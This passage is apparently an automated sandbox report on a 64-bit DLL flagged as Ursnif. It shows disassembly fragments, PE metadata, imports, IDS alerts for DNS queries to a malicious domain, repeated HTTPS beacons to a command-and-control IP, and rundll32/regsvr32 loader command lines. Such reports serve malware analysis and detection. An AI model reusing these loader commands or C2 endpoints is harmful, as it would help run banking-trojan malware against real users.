                        mov ebx, dword ptr [esp+30h]
                        dec eax
                        mov esi, dword ptr [esp+38h]
                        dec eax
                        add esp, 20h
                        pop edi
                        jmp 00007FE818B8236Ch
                        int3
                        int3
                        int3
                        dec eax
                        sub esp, 28h
                        call 00007FE818B82D88h
                        test eax, eax
                        je 00007FE818B82513h
                        dec eax
                        mov eax, dword ptr [00000030h]
                        dec eax
                        mov ecx, dword ptr [eax+08h]
                        jmp 00007FE818B824F7h
                        dec eax
                        cmp ecx, eax
                        je 00007FE818B82506h
                        xor eax, eax
                        dec eax
                        cmpxchg dword ptr [00038A68h], ecx
                        jne 00007FE818B824E0h
                        xor al, al
                        dec eax
                        add esp, 28h
                        ret
                        mov al, 01h
                        jmp 00007FE818B824E9h
                        int3
                        int3
                        int3
                        dec eax
                        sub esp, 28h
                        call 00007FE818B82D4Ch
                        test eax, eax
                        je 00007FE818B824F9h
                        call 00007FE818B82B6Fh
                        jmp 00007FE818B8250Bh
                        call 00007FE818B82D34h
                        mov ecx, eax
                        call 00007FE818B844A1h
                        test eax, eax
                        je 00007FE818B824F6h
                        xor al, al
                        jmp 00007FE818B824F9h
                        call 00007FE818B84828h
                        mov al, 01h
                        dec eax
                        add esp, 28h
                        ret
                        dec eax
                        sub esp, 28h
                        xor ecx, ecx
                        call 00007FE818B82636h
                        test al, al
                        setne al
                        dec eax
                        add esp, 28h
                        ret
                        int3
                        int3
                        Programming Language:
                        • [C++] VS2015 UPD3.1 build 24215
                        • [EXP] VS2015 UPD3.1 build 24215
                        • [LNK] VS2015 UPD3.1 build 24215
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x371c00x94.rdata
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x372540x28.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x460000x15cc.pdata
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x446000x2908
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x490000x618.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x34dd00x1c.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x34df00x94.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x230000x2a8.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x213900x21400False0.6091694078947368zlib compressed data6.321988758719223IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x230000x14b400x14c00False0.5551228350903614data5.589680054404924IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x380000xd3780xc200False0.581286243556701data4.475772855701728IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .pdata0x460000x15cc0x1600False0.49556107954545453data5.3249872988992655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .gfids0x480000x940x200False0.248046875data1.4095612964443904IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x490000x6180x800False0.54150390625data4.760086879502757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        DLLImport
                        KERNEL32.dllCreateFileA, LockFile, ReadFile, SetEndOfFile, UnlockFile, CloseHandle, PeekNamedPipe, HeapCreate, HeapAlloc, HeapFree, GetProcessHeap, HeapWalk, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, WaitForSingleObject, ExitProcess, CreateThread, VirtualAlloc, GetProcAddress, CreateFileMappingA, LoadLibraryA, CreateNamedPipeA, CallNamedPipeA, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, RtlUnwindEx, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetCurrentProcess, TerminateProcess, GetModuleHandleExW, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStdHandle, GetFileType, GetStringTypeW, CreateFileW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, ReadConsoleW, SetFilePointerEx, WriteConsoleW, RaiseException
                        NameOrdinalAddress
                        DllRegisterServer10x180002380
                        ItsnPq5v20x180002390
                        QlqYo259k30x180017c20
                        XeFnYZ40940x1800175e0
                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        192.168.2.48.8.8.864906532039645 11/24/22-05:22:35.810533UDP2039645ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz)6490653192.168.2.48.8.8.8
                        192.168.2.48.8.8.861007532039645 11/24/22-05:20:02.978332UDP2039645ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz)6100753192.168.2.48.8.8.8
                        192.168.2.48.8.8.861124532039645 11/24/22-05:21:04.451832UDP2039645ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz)6112453192.168.2.48.8.8.8
                        192.168.2.48.8.8.859444532039645 11/24/22-05:21:34.871041UDP2039645ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz)5944453192.168.2.48.8.8.8
                        192.168.2.48.8.8.855570532039645 11/24/22-05:22:05.359167UDP2039645ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz)5557053192.168.2.48.8.8.8
                        192.168.2.48.8.8.860686532039645 11/24/22-05:20:33.386749UDP2039645ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz)6068653192.168.2.48.8.8.8
                        192.168.2.48.8.8.859446532039645 11/24/22-05:23:06.390786UDP2039645ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz)5944653192.168.2.48.8.8.8
                        TimestampSource PortDest PortSource IPDest IP
                        Nov 24, 2022 05:20:03.012599945 CET49706443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:03.012650967 CET44349706185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:03.012737036 CET49706443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:03.016460896 CET49706443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:03.016508102 CET44349706185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:03.072525024 CET44349706185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:03.074080944 CET49707443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:03.074155092 CET44349707185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:03.074337959 CET49707443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:03.075628996 CET49707443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:03.075655937 CET44349707185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:03.131845951 CET44349707185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:03.133225918 CET49708443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:03.133289099 CET44349708185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:03.133398056 CET49708443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:03.134278059 CET49708443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:03.134324074 CET44349708185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:03.191957951 CET44349708185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:03.193757057 CET49709443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:03.193816900 CET44349709185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:03.193898916 CET49709443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:03.194484949 CET49709443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:03.194506884 CET44349709185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:03.250332117 CET44349709185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:33.407180071 CET49710443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:33.407258034 CET44349710185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:33.407423019 CET49710443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:33.408660889 CET49710443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:33.408710957 CET44349710185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:33.463525057 CET44349710185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:33.465197086 CET49711443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:33.465265036 CET44349711185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:33.465380907 CET49711443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:33.466645002 CET49711443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:33.466680050 CET44349711185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:33.522078991 CET44349711185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:33.525345087 CET49712443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:33.525413036 CET44349712185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:33.525672913 CET49712443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:33.526755095 CET49712443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:33.526801109 CET44349712185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:33.582118988 CET44349712185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:33.585807085 CET49713443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:33.585897923 CET44349713185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:33.586055040 CET49713443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:33.586787939 CET49713443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:20:33.586810112 CET44349713185.250.148.35192.168.2.4
                        Nov 24, 2022 05:20:33.641958952 CET44349713185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:04.485233068 CET49714443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:04.485310078 CET44349714185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:04.485480070 CET49714443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:04.486561060 CET49714443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:04.486601114 CET44349714185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:04.541218996 CET44349714185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:04.542530060 CET49715443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:04.542584896 CET44349715185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:04.542787075 CET49715443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:04.543291092 CET49715443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:04.543320894 CET44349715185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:04.598916054 CET44349715185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:04.600245953 CET49716443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:04.600316048 CET44349716185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:04.600423098 CET49716443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:04.600950003 CET49716443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:04.600979090 CET44349716185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:04.668997049 CET44349716185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:04.685195923 CET49717443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:04.685261965 CET44349717185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:04.685632944 CET49717443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:04.686243057 CET49717443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:04.686269045 CET44349717185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:04.742952108 CET44349717185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:34.890145063 CET49718443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:34.890221119 CET44349718185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:34.890311956 CET49718443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:34.891124010 CET49718443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:34.891169071 CET44349718185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:34.949980021 CET44349718185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:34.951565027 CET49719443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:34.951642990 CET44349719185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:34.951733112 CET49719443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:34.952301979 CET49719443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:34.952337027 CET44349719185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:35.007440090 CET44349719185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:35.008912086 CET49720443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:35.008971930 CET44349720185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:35.009077072 CET49720443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:35.009592056 CET49720443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:35.009608984 CET44349720185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:35.066533089 CET44349720185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:35.083612919 CET49721443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:35.083692074 CET44349721185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:35.083832026 CET49721443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:35.084454060 CET49721443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:21:35.084505081 CET44349721185.250.148.35192.168.2.4
                        Nov 24, 2022 05:21:35.141772032 CET44349721185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:05.380898952 CET49722443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:05.380964041 CET44349722185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:05.381064892 CET49722443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:05.382277966 CET49722443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:05.382314920 CET44349722185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:05.438138962 CET44349722185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:05.455518007 CET49723443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:05.455600977 CET44349723185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:05.455710888 CET49723443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:05.458941936 CET49723443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:05.458985090 CET44349723185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:05.514117002 CET44349723185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:05.520054102 CET49724443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:05.520131111 CET44349724185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:05.520246029 CET49724443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:05.521112919 CET49724443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:05.521135092 CET44349724185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:05.579657078 CET44349724185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:05.581623077 CET49725443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:05.581677914 CET44349725185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:05.581792116 CET49725443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:05.582617998 CET49725443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:05.582637072 CET44349725185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:05.638403893 CET44349725185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:35.831705093 CET49726443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:35.831753016 CET44349726185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:35.831830025 CET49726443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:35.832879066 CET49726443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:35.832906008 CET44349726185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:35.888338089 CET44349726185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:35.889817953 CET49727443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:35.889899969 CET44349727185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:35.890064955 CET49727443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:35.890661955 CET49727443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:35.890711069 CET44349727185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:35.947293997 CET44349727185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:35.948555946 CET49728443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:35.948637009 CET44349728185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:35.948796034 CET49728443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:35.949640989 CET49728443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:35.949681997 CET44349728185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:36.007163048 CET44349728185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:36.023938894 CET49729443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:36.023996115 CET44349729185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:36.024108887 CET49729443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:36.025345087 CET49729443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:22:36.025382042 CET44349729185.250.148.35192.168.2.4
                        Nov 24, 2022 05:22:36.080106020 CET44349729185.250.148.35192.168.2.4
                        Nov 24, 2022 05:23:06.409924984 CET49730443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:23:06.409976006 CET44349730185.250.148.35192.168.2.4
                        Nov 24, 2022 05:23:06.410056114 CET49730443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:23:06.411086082 CET49730443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:23:06.411104918 CET44349730185.250.148.35192.168.2.4
                        Nov 24, 2022 05:23:06.465995073 CET44349730185.250.148.35192.168.2.4
                        Nov 24, 2022 05:23:06.469316959 CET49731443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:23:06.469379902 CET44349731185.250.148.35192.168.2.4
                        Nov 24, 2022 05:23:06.469492912 CET49731443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:23:06.470561028 CET49731443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:23:06.470582008 CET44349731185.250.148.35192.168.2.4
                        Nov 24, 2022 05:23:06.525172949 CET44349731185.250.148.35192.168.2.4
                        Nov 24, 2022 05:23:06.530029058 CET49732443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:23:06.530122042 CET44349732185.250.148.35192.168.2.4
                        Nov 24, 2022 05:23:06.530237913 CET49732443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:23:06.531049967 CET49732443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:23:06.531092882 CET44349732185.250.148.35192.168.2.4
                        Nov 24, 2022 05:23:06.586215019 CET44349732185.250.148.35192.168.2.4
                        Nov 24, 2022 05:23:06.591008902 CET49733443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:23:06.591080904 CET44349733185.250.148.35192.168.2.4
                        Nov 24, 2022 05:23:06.591201067 CET49733443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:23:06.592061043 CET49733443192.168.2.4185.250.148.35
                        Nov 24, 2022 05:23:06.592088938 CET44349733185.250.148.35192.168.2.4
                        Nov 24, 2022 05:23:06.646756887 CET44349733185.250.148.35192.168.2.4
                        TimestampSource PortDest PortSource IPDest IP
                        Nov 24, 2022 05:20:02.978332043 CET6100753192.168.2.48.8.8.8
                        Nov 24, 2022 05:20:02.997380018 CET53610078.8.8.8192.168.2.4
                        Nov 24, 2022 05:20:33.386749029 CET6068653192.168.2.48.8.8.8
                        Nov 24, 2022 05:20:33.404028893 CET53606868.8.8.8192.168.2.4
                        Nov 24, 2022 05:21:04.451832056 CET6112453192.168.2.48.8.8.8
                        Nov 24, 2022 05:21:04.469230890 CET53611248.8.8.8192.168.2.4
                        Nov 24, 2022 05:21:34.871041059 CET5944453192.168.2.48.8.8.8
                        Nov 24, 2022 05:21:34.888430119 CET53594448.8.8.8192.168.2.4
                        Nov 24, 2022 05:22:05.359167099 CET5557053192.168.2.48.8.8.8
                        Nov 24, 2022 05:22:05.377713919 CET53555708.8.8.8192.168.2.4
                        Nov 24, 2022 05:22:35.810533047 CET6490653192.168.2.48.8.8.8
                        Nov 24, 2022 05:22:35.829649925 CET53649068.8.8.8192.168.2.4
                        Nov 24, 2022 05:23:06.390785933 CET5944653192.168.2.48.8.8.8
                        Nov 24, 2022 05:23:06.408032894 CET53594468.8.8.8192.168.2.4
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Nov 24, 2022 05:20:02.978332043 CET192.168.2.48.8.8.80x362cStandard query (0)gigimas.xyzA (IP address)IN (0x0001)false
                        Nov 24, 2022 05:20:33.386749029 CET192.168.2.48.8.8.80x306eStandard query (0)gigimas.xyzA (IP address)IN (0x0001)false
                        Nov 24, 2022 05:21:04.451832056 CET192.168.2.48.8.8.80xfd4eStandard query (0)gigimas.xyzA (IP address)IN (0x0001)false
                        Nov 24, 2022 05:21:34.871041059 CET192.168.2.48.8.8.80xbb49Standard query (0)gigimas.xyzA (IP address)IN (0x0001)false
                        Nov 24, 2022 05:22:05.359167099 CET192.168.2.48.8.8.80xe9a0Standard query (0)gigimas.xyzA (IP address)IN (0x0001)false
                        Nov 24, 2022 05:22:35.810533047 CET192.168.2.48.8.8.80x374bStandard query (0)gigimas.xyzA (IP address)IN (0x0001)false
                        Nov 24, 2022 05:23:06.390785933 CET192.168.2.48.8.8.80x8724Standard query (0)gigimas.xyzA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Nov 24, 2022 05:20:02.997380018 CET8.8.8.8192.168.2.40x362cNo error (0)gigimas.xyz185.250.148.35A (IP address)IN (0x0001)false
                        Nov 24, 2022 05:20:33.404028893 CET8.8.8.8192.168.2.40x306eNo error (0)gigimas.xyz185.250.148.35A (IP address)IN (0x0001)false
                        Nov 24, 2022 05:21:04.469230890 CET8.8.8.8192.168.2.40xfd4eNo error (0)gigimas.xyz185.250.148.35A (IP address)IN (0x0001)false
                        Nov 24, 2022 05:21:34.888430119 CET8.8.8.8192.168.2.40xbb49No error (0)gigimas.xyz185.250.148.35A (IP address)IN (0x0001)false
                        Nov 24, 2022 05:22:05.377713919 CET8.8.8.8192.168.2.40xe9a0No error (0)gigimas.xyz185.250.148.35A (IP address)IN (0x0001)false
                        Nov 24, 2022 05:22:35.829649925 CET8.8.8.8192.168.2.40x374bNo error (0)gigimas.xyz185.250.148.35A (IP address)IN (0x0001)false
                        Nov 24, 2022 05:23:06.408032894 CET8.8.8.8192.168.2.40x8724No error (0)gigimas.xyz185.250.148.35A (IP address)IN (0x0001)false

                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:05:19:01
                        Start date:24/11/2022
                        Path:C:\Windows\System32\loaddll64.exe
                        Wow64 process (32bit):false
                        Commandline:loaddll64.exe "C:\Users\user\Desktop\pzG0rkIchr.dll"
                        Imagebase:0x7ff72b830000
                        File size:139776 bytes
                        MD5 hash:C676FC0263EDD17D4CE7D644B8F3FCD6
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:1
                        Start time:05:19:02
                        Start date:24/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c72c0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:2
                        Start time:05:19:02
                        Start date:24/11/2022
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1
                        Imagebase:0x7ff632260000
                        File size:273920 bytes
                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:3
                        Start time:05:19:02
                        Start date:24/11/2022
                        Path:C:\Windows\System32\regsvr32.exe
                        Wow64 process (32bit):false
                        Commandline:regsvr32.exe /s C:\Users\user\Desktop\pzG0rkIchr.dll
                        Imagebase:0x7ff762150000
                        File size:24064 bytes
                        MD5 hash:D78B75FC68247E8A63ACBA846182740E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:4
                        Start time:05:19:02
                        Start date:24/11/2022
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1
                        Imagebase:0x7ff736ed0000
                        File size:69632 bytes
                        MD5 hash:73C519F050C20580F8A62C849D49215A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:5
                        Start time:05:19:02
                        Start date:24/11/2022
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,DllRegisterServer
                        Imagebase:0x7ff736ed0000
                        File size:69632 bytes
                        MD5 hash:73C519F050C20580F8A62C849D49215A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:6
                        Start time:05:19:07
                        Start date:24/11/2022
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,ItsnPq5v
                        Imagebase:0x7ff736ed0000
                        File size:69632 bytes
                        MD5 hash:73C519F050C20580F8A62C849D49215A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:9
                        Start time:05:19:12
                        Start date:24/11/2022
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,QlqYo259k
                        Imagebase:0x7ff736ed0000
                        File size:69632 bytes
                        MD5 hash:73C519F050C20580F8A62C849D49215A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:11
                        Start time:05:19:18
                        Start date:24/11/2022
                        Path:C:\Windows\System32\WerFault.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WerFault.exe -u -p 2100 -s 304
                        Imagebase:0x7ff69db50000
                        File size:494488 bytes
                        MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:12
                        Start time:05:19:23
                        Start date:24/11/2022
                        Path:C:\Windows\System32\WerFault.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WerFault.exe -u -p 1308 -s 304
                        Imagebase:0x7ff69db50000
                        File size:494488 bytes
                        MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:13
                        Start time:05:19:27
                        Start date:24/11/2022
                        Path:C:\Windows\System32\WerFault.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WerFault.exe -u -p 2100 -s 304
                        Imagebase:0x7ff69db50000
                        File size:494488 bytes
                        MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:14
                        Start time:05:19:42
                        Start date:24/11/2022
                        Path:C:\Windows\System32\WerFault.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WerFault.exe -u -p 1308 -s 304
